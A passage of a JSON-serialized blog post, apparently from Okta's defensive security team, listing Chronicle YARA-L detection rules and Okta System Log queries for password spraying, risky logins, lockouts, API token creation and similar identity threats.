Attack\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1110/003/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1110.003\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technique\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Brute Force: Password Spraying\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle identifier\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/chronicle/detection-rules/blob/main/rules/community/okta/okta_threatinsight_suspected_password_spray_attack.yaral\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta_threatinsight_suspected_password_spray_attack\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta's ThreatInsight can identify Password Spray attacks.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Reference\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"System Log events for Okta ThreatInsight\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log Query\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"security.threat.detected\\\" and outcome.reason eq \\\"Password Spray\\\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Successful Login Evaluated as High Risk\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1078/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1078\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technique\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Valid Accounts\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle identifier\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/chronicle/detection-rules/blob/main/rules/community/okta/okta_successful_high_risk_user_logins.yaral\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta_successful_high_risk_user_logins\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"NEW: Detects successfully authenticated user logins based on Okta's Behavior Detection pattern analysis.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Reference\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/behavior-detection/logs-behavior-detection.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Behavior Detection System Log events\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log Query\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"outcome.result eq \\\"SUCCESS\\\" and debugContext.debugData.risk co \\\"HIGH\\\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta User Account Lockout\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1078/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1078\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technique\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Valid Accounts\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle identifier\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/chronicle/detection-rules/blob/main/rules/community/okta/okta_user_account_lockout.yaral\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta_user_account_lockout\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"NEW: Detects when a user's account is locked out or a user account has reached the lockout limit.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Reference\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/resources/whitepaper/how-adaptive-mfa-helps-mitigate-brute-force-attacks\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"How Adaptive MFA Helps Mitigate Brute Force Attacks\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log Query\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"user.account.lock\\\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"New Okta API Token Created\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1078/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1078\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technique\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Valid Accounts\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle Identifier\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/chronicle/detection-rules/blob/main/rules/community/okta/okta_new_api_token_created.yaral\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta_new_api_token_created\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"NEW: Detects when a new API token is created.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Reference\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/guides/tokens/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Tokens\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log Query\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"system.api_token.create\\\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Out of Hours Successful Authentication\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1078/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1078\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technique\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Valid Accounts\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle identifier\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/chronicle/detection-rules/blob/main/rules/community/okta/okta_user_login_out_of_hours.yaral\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta_user_login_out_of_hours\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"NEW: Detects out of hours successful authentication.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Reference\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/User-Signin-and-Recovery-Events-in-the-Okta-System-Log\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"User Sign-in and Recovery Events in the Okta System Log\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"User Logins from Multiple Cities\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1078/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1078\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technique\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Valid Accounts\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle identifier\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/chronicle/detection-rules/blob/main/rules/community/okta/okta_user_logins_from_multiple_cities.yaral\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta_user_logins_from_multiple_cities\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"NEW: Detects user logins for the same user from different cities within 24 hours.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Reference\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/behavior-detection/logs-behavior-detection.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Behavior Detection System Log events\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We found this exercise to be fulfilling. Writing YARA-L queries is new to us, but they have been super easy to read and collaborate on. Even if you’re not a Chronicle customer, you might find it valuable to read the detection logic in Chronicle to frame your thinking about how you might go about detecting these types of threats.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What’s next?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Once we’re happy with our detections, phishing resistant factors and other control slices; where should we invest our energy next? I’d suggest considering what an adversary might now need to do for persistence and lateral movement. Perhaps they could socially engineer a new factor, a managed device or even a whole new account?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Best get thinking about how you’d detect:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"User factors added or modified \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/event-types/#catalog\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"(user.mfa.factor*)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"New users created (user.lifecycle.create)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Devices added to MDM\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Remote Monitoring and Management tool installation or execution\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"VM installation on workstations\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Duplicate hostnames\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Gouda luck!\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2025-05-01T18:16:44.238Z","secAuthor":[{"id":"40144a58-c93f-5b84-895a-5658f212b168","bio":{"bio":"The Defensive Cyber Operations (DCO) team is responsible for detecting and responding to cyber threats that impact Okta or our customers via the Okta platform. Our intelligence-driven capability identifies the adversaries most likely to impact Okta and our customers, and prioritises our defensive capabilities based on the threats most likely to be realised.
